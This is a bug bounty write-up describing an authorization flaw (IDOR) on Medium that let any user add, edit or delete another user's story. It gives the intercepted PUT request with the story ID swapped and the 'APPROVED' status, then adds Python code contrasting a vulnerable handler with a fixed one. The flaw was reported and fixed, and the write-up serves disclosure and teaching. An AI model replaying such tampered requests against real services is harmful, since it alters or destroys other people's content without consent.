Update and Delete any Story of any user on Medium

by Allan Jay Dumanhug, June 29th, 2016

Before the end of this year, two well-known people were hacked: Mark Zuckerberg, CEO of Facebook, and Sundar Pichai, CEO of Google. I was thinking, what if it’s time for me to hack Barack Obama? But I know that isn’t easy.


So, I decided to use my big brain to think my way out!Looking for a new angle… Then, I found the “Request Story” button hiding in the ‘ellipsis’ or ‘more’ icon.

But there’s a problem. They need to approve my request to add their story to my publication, and that’s absolutely impossible. Apparently, though, I can add my own story to my publication without further ado.

The first step of adding a story to a publication.

The second and last step is to choose the publication to which you want to add the story.

My goal here is to add any story of another user to my publication without their consent, and I did that using the “Add story to publication” button.

While I was adding my own story to my publication, I intercepted the HTTP request to modify the story ID.


My Story ID: 2a4b6810c12dStory ID of the target: 1a3b579c101a

The HTTP Request:

PUT /testphzxc/2a4b6810c12d HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}

{"postStatus":"APPROVED"}

In the line where the PUT method is located, you will see the ID of my story. I will remove that ID and put in the ID of the target’s story.

Updated HTTP Request:

PUT /testphzxc/1a3b579c101a HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}

{"postStatus":"APPROVED"}

Of course, as I mentioned above, the story is automatically added to my publication without the author’s consent. That is because of:

{"postStatus":"APPROVED"}

Then *Poof*. The target’s story was added to my publication.

Now what? Because the story was added to my publication, I am now able to edit or delete it.
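The root cause is that the server trusted the client-supplied story ID and `postStatus` without checking who wrote the story. The following is an added example, not Medium’s code, that models the `PUT /<publication>/<storyId>` endpoint from this write-up as a vulnerable handler next to a hardened one; the function names, the `REQUESTED` status for a pending request, and the in-memory records are assumptions.

```python
# Added example (not Medium's code): the "add story to publication" endpoint,
# PUT /<publication>/<storyId> with body {"postStatus":"APPROVED"}, modelled
# twice: as the vulnerable handler and as a hardened one. Names, the REQUESTED
# (pending) status and the sample records below are assumptions.
from dataclasses import dataclass
import json

@dataclass
class Story:
    story_id: str
    author_id: str

@dataclass
class Publication:
    slug: str
    editor_ids: set  # users allowed to manage this publication

# Constructed sample data mirroring the IDs used in the write-up.
ATTACKER, TARGET = "user-attacker", "user-target"
STORIES = {
    "2a4b6810c12d": Story("2a4b6810c12d", ATTACKER),  # attacker's own story
    "1a3b579c101a": Story("1a3b579c101a", TARGET),    # another user's story
}
PUBLICATIONS = {"testphzxc": Publication("testphzxc", {ATTACKER})}
POST_STATUS = {}  # (publication slug, story_id) -> status

def parse_request(path, body):
    """Split '/<pub>/<storyId>' into its parts and decode the JSON body."""
    _, slug, story_id = path.split("/")
    return slug, story_id, json.loads(body)["postStatus"]

def vulnerable_set_post_status(actor_id, path, body):
    """Checks only that the caller edits the publication, never who wrote the story."""
    slug, story_id, status = parse_request(path, body)
    if actor_id not in PUBLICATIONS[slug].editor_ids:
        return 403
    POST_STATUS[(slug, story_id)] = status  # IDOR: any story_id is accepted
    return 200

def set_post_status(actor_id, path, body):
    """Hardened: APPROVED requires the caller to be the story's author; an editor
    who did not write the story may only record a REQUESTED (pending) status."""
    slug, story_id, status = parse_request(path, body)
    if actor_id not in PUBLICATIONS[slug].editor_ids:
        return 403
    story = STORIES.get(story_id)
    if story is None:
        return 404
    if status not in ("APPROVED", "REQUESTED"):
        return 400
    if status == "APPROVED" and story.author_id != actor_id:
        return 403  # consent must come from the author, not the publication
    POST_STATUS[(slug, story_id)] = status
    return 200
```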

Well, instead of attacking Mr. Obama’s blog, I reported it to Medium. They fixed it and rewarded me with a $250 bounty, but I wanted more because I had found multiple bugs in my report: first, bypassing the Request Story approval, and second, updating and deleting any story. They then added a $100 bounty to the previous one, for a total of $350.